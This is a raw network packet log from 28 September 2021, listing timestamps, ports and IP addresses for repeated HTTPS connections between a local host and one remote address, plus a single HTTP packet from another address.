Sep 28, 2021 07:59:38.037523031 CEST	443	50070	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:38.097614050 CEST	443	50070	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:38.100188971 CEST	50070	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:38.100205898 CEST	443	50070	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:38.100300074 CEST	50070	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:38.100307941 CEST	443	50070	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:38.214180946 CEST	443	50070	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:38.214267015 CEST	443	50070	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:38.214320898 CEST	50070	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:38.215993881 CEST	50070	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:38.218816042 CEST	50072	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:38.218852043 CEST	443	50072	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:38.218930960 CEST	50072	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:38.219631910 CEST	50072	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:38.219643116 CEST	443	50072	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:38.274277925 CEST	80	49773	132.226.8.169	192.168.2.4
Sep 28, 2021 07:59:38.277368069 CEST	443	50072	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:38.280047894 CEST	50072	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:38.280076981 CEST	443	50072	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:38.280136108 CEST	50072	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:38.280141115 CEST	443	50072	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:38.383054972 CEST	443	50072	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:38.383145094 CEST	443	50072	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:38.383200884 CEST	50072	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:38.384097099 CEST	50072	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:38.385328054 CEST	50073	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:38.385369062 CEST	443	50073	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:38.385458946 CEST	50073	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:38.385886908 CEST	50073	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:38.385900021 CEST	443	50073	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:38.441651106 CEST	443	50073	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:38.447242975 CEST	50073	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:38.447330952 CEST	443	50073	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:38.447411060 CEST	50073	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:38.447429895 CEST	443	50073	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:38.817070007 CEST	443	50073	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:38.817147970 CEST	443	50073	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:38.817241907 CEST	50073	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:38.818324089 CEST	50073	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:38.821003914 CEST	50076	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:38.821050882 CEST	443	50076	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:38.821122885 CEST	50076	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:38.821764946 CEST	50076	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:38.821783066 CEST	443	50076	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:38.878000975 CEST	443	50076	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:38.882575989 CEST	50076	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:38.882600069 CEST	443	50076	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:38.882759094 CEST	50076	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:38.882764101 CEST	443	50076	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:38.988581896 CEST	443	50076	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:38.988667965 CEST	443	50076	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:38.988743067 CEST	50076	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:38.990190029 CEST	50076	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:38.992448092 CEST	50078	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:38.992491007 CEST	443	50078	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:38.992595911 CEST	50078	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:38.993293047 CEST	50078	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:38.993309021 CEST	443	50078	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:39.049916029 CEST	443	50078	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:39.054534912 CEST	50078	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:39.054565907 CEST	443	50078	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:39.054668903 CEST	50078	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:39.054677963 CEST	443	50078	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:39.202254057 CEST	443	50078	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:39.202338934 CEST	443	50078	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:39.202476025 CEST	50078	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:39.203558922 CEST	50078	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:39.205348969 CEST	50080	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:39.205393076 CEST	443	50080	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:39.205537081 CEST	50080	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:39.206404924 CEST	50080	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:39.206432104 CEST	443	50080	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:39.265798092 CEST	443	50080	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:39.270765066 CEST	50080	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:39.270803928 CEST	443	50080	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:39.271229982 CEST	50080	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:39.271245003 CEST	443	50080	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:39.446871042 CEST	443	50080	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:39.446965933 CEST	443	50080	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:39.447148085 CEST	50080	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:39.448002100 CEST	50080	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:39.449513912 CEST	50082	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:39.449582100 CEST	443	50082	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:39.450087070 CEST	50082	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:39.450726032 CEST	50082	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:39.450750113 CEST	443	50082	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:39.517447948 CEST	443	50082	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:39.522047043 CEST	50082	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:39.522124052 CEST	443	50082	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:39.522589922 CEST	50082	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:39.522607088 CEST	443	50082	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:39.686824083 CEST	443	50082	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:39.687688112 CEST	443	50082	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:39.687869072 CEST	50082	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:39.688442945 CEST	50082	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:39.690221071 CEST	50084	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:39.690264940 CEST	443	50084	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:39.690762043 CEST	50084	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:39.691381931 CEST	50084	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:39.691401005 CEST	443	50084	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:39.751799107 CEST	443	50084	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:39.755937099 CEST	50084	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:39.755971909 CEST	443	50084	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:39.762028933 CEST	50084	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:39.762067080 CEST	443	50084	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:39.950361013 CEST	443	50084	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:39.950449944 CEST	443	50084	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:39.950589895 CEST	50084	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:39.951742887 CEST	50084	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:39.953617096 CEST	50087	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:39.953668118 CEST	443	50087	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:39.953877926 CEST	50087	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:39.954560041 CEST	50087	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:39.954572916 CEST	443	50087	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:40.020900965 CEST	443	50087	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:40.025382042 CEST	50087	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:40.025424957 CEST	443	50087	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:40.025542021 CEST	50087	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:40.025554895 CEST	443	50087	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:40.187280893 CEST	443	50087	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:40.187372923 CEST	443	50087	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:40.187855959 CEST	50087	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:40.188721895 CEST	50087	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:40.190793037 CEST	50089	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:40.190829992 CEST	443	50089	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:40.190969944 CEST	50089	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:40.191545010 CEST	50089	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:40.191562891 CEST	443	50089	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:40.247714996 CEST	443	50089	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:40.250850916 CEST	50089	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:40.250893116 CEST	443	50089	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:40.251003981 CEST	50089	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:40.251015902 CEST	443	50089	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:40.391525984 CEST	443	50089	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:40.391612053 CEST	443	50089	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:40.391809940 CEST	50089	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:40.392915964 CEST	50089	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:40.394905090 CEST	50091	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:40.394967079 CEST	443	50091	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:40.395095110 CEST	50091	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:40.395658016 CEST	50091	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:40.395693064 CEST	443	50091	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:40.452805042 CEST	443	50091	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:40.456237078 CEST	50091	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:40.456310987 CEST	443	50091	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:40.456434965 CEST	50091	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:40.456450939 CEST	443	50091	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:40.600121975 CEST	443	50091	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:40.600192070 CEST	443	50091	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:40.600712061 CEST	50091	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:40.601476908 CEST	50091	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:40.602772951 CEST	50093	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:40.602824926 CEST	443	50093	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:40.603096008 CEST	50093	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:40.603940964 CEST	50093	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:40.603960037 CEST	443	50093	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:40.662175894 CEST	443	50093	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:40.668203115 CEST	50093	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:40.668241978 CEST	443	50093	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:40.668519020 CEST	50093	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:40.668536901 CEST	443	50093	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:40.760906935 CEST	443	50093	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:40.761029005 CEST	443	50093	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:40.761921883 CEST	50093	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:40.762660027 CEST	50093	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:40.764751911 CEST	50094	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:40.764807940 CEST	443	50094	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:40.764985085 CEST	50094	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:40.766074896 CEST	50094	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:40.766097069 CEST	443	50094	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:40.842397928 CEST	443	50094	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:40.847371101 CEST	50094	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:40.847409010 CEST	443	50094	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:40.847677946 CEST	50094	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:40.847698927 CEST	443	50094	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:41.036427975 CEST	443	50094	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:41.036513090 CEST	443	50094	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:41.036788940 CEST	50094	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:41.037781954 CEST	50094	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:41.040086031 CEST	50097	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:41.040152073 CEST	443	50097	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:41.040277958 CEST	50097	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:41.040750980 CEST	50097	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:41.040775061 CEST	443	50097	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:41.096910954 CEST	443	50097	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:41.101269960 CEST	50097	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:41.101303101 CEST	443	50097	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:41.101504087 CEST	50097	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:41.101516008 CEST	443	50097	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:41.218523979 CEST	443	50097	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:41.218590021 CEST	443	50097	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:41.218761921 CEST	50097	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:41.219958067 CEST	50097	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:41.221873045 CEST	50098	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:41.221926928 CEST	443	50098	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:41.222059011 CEST	50098	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:41.222620010 CEST	50098	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:41.222645998 CEST	443	50098	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:41.285284042 CEST	443	50098	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:41.288106918 CEST	50098	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:41.288149118 CEST	443	50098	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:41.288240910 CEST	50098	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:41.288249969 CEST	443	50098	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:41.426156044 CEST	443	50098	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:41.426251888 CEST	443	50098	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:41.426412106 CEST	50098	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:41.427701950 CEST	50098	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:41.430182934 CEST	50099	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:41.430227041 CEST	443	50099	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:41.430402040 CEST	50099	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:41.431063890 CEST	50099	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:41.431083918 CEST	443	50099	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:41.489353895 CEST	443	50099	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:41.492456913 CEST	50099	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:41.492496967 CEST	443	50099	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:41.492594004 CEST	50099	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:41.492604971 CEST	443	50099	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:41.583039999 CEST	443	50099	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:41.583138943 CEST	443	50099	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:41.583225965 CEST	50099	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:41.584445000 CEST	50099	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:41.586860895 CEST	50100	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:41.586919069 CEST	443	50100	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:41.587066889 CEST	50100	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:41.587661028 CEST	50100	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:41.587686062 CEST	443	50100	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:41.648787975 CEST	443	50100	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:41.652331114 CEST	50100	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:41.652374029 CEST	443	50100	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:41.652457952 CEST	50100	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:41.652472019 CEST	443	50100	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:41.846447945 CEST	443	50100	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:41.846529961 CEST	443	50100	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:41.846609116 CEST	50100	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:41.848326921 CEST	50100	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:41.851269960 CEST	50101	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:41.851337910 CEST	443	50101	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:41.852582932 CEST	50101	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:41.852622032 CEST	50101	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:41.852632046 CEST	443	50101	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:41.921730042 CEST	443	50101	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:41.926186085 CEST	50101	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:41.926234007 CEST	443	50101	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:41.926362991 CEST	50101	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:41.926373959 CEST	443	50101	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:42.046786070 CEST	443	50101	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:42.046885014 CEST	443	50101	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:42.050735950 CEST	50101	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:42.050779104 CEST	50101	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:42.050859928 CEST	50102	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:42.050911903 CEST	443	50102	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:42.051064968 CEST	50102	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:42.051686049 CEST	50102	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:42.051707029 CEST	443	50102	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:42.133846045 CEST	443	50102	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:42.136622906 CEST	50102	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:42.137053967 CEST	443	50102	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:42.140188932 CEST	50102	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:42.140209913 CEST	443	50102	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:42.233479023 CEST	443	50102	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:42.233486891 CEST	443	50102	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:42.235064983 CEST	50102	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:42.235105038 CEST	50102	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:42.240184069 CEST	50103	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:42.240231037 CEST	443	50103	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:42.241822958 CEST	50103	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:42.245451927 CEST	50103	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:42.245475054 CEST	443	50103	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:42.323867083 CEST	443	50103	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:42.327948093 CEST	50103	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:42.327986956 CEST	443	50103	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:42.328258038 CEST	50103	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:42.328268051 CEST	443	50103	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:42.572242975 CEST	443	50103	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:42.572329044 CEST	443	50103	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:42.578048944 CEST	50103	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:42.600465059 CEST	50104	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:42.600524902 CEST	443	50104	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:42.600646973 CEST	50104	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:42.601811886 CEST	50104	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:42.601833105 CEST	443	50104	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:42.604711056 CEST	50103	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:42.661252022 CEST	443	50104	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:42.667201042 CEST	50104	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:42.668581009 CEST	443	50104	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:42.669269085 CEST	50104	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:42.669281960 CEST	443	50104	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:42.915000916 CEST	443	50104	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:42.915132999 CEST	443	50104	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:42.915316105 CEST	50104	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:42.916479111 CEST	50104	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:42.918174028 CEST	50105	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:42.918222904 CEST	443	50105	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:42.920371056 CEST	50105	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:42.920413017 CEST	50105	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:42.920423985 CEST	443	50105	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:42.980429888 CEST	443	50105	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:42.990288973 CEST	50105	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:42.990319014 CEST	443	50105	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:42.990432978 CEST	50105	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:42.990443945 CEST	443	50105	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:43.302489996 CEST	443	50105	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:43.302758932 CEST	443	50105	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:43.303597927 CEST	50105	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:43.304016113 CEST	50105	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:43.306268930 CEST	50106	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:43.306325912 CEST	443	50106	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:43.306447983 CEST	50106	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:43.307023048 CEST	50106	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:43.307041883 CEST	443	50106	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:43.371870041 CEST	443	50106	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:43.376534939 CEST	50106	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:43.376588106 CEST	443	50106	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:43.378065109 CEST	50106	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:43.378101110 CEST	443	50106	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:43.478914976 CEST	443	50106	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:43.479007959 CEST	443	50106	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:43.479126930 CEST	50106	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:43.480163097 CEST	50106	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:43.481801987 CEST	50107	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:43.481853008 CEST	443	50107	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:43.481959105 CEST	50107	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:43.482538939 CEST	50107	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:43.482563019 CEST	443	50107	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:43.544636011 CEST	443	50107	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:43.554543972 CEST	50107	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:43.554585934 CEST	443	50107	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:43.554832935 CEST	50107	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:43.554852962 CEST	443	50107	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:43.645184994 CEST	443	50107	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:43.645291090 CEST	443	50107	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:43.645456076 CEST	50107	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:43.646585941 CEST	50107	443	192.168.2.4	149.154.167.220
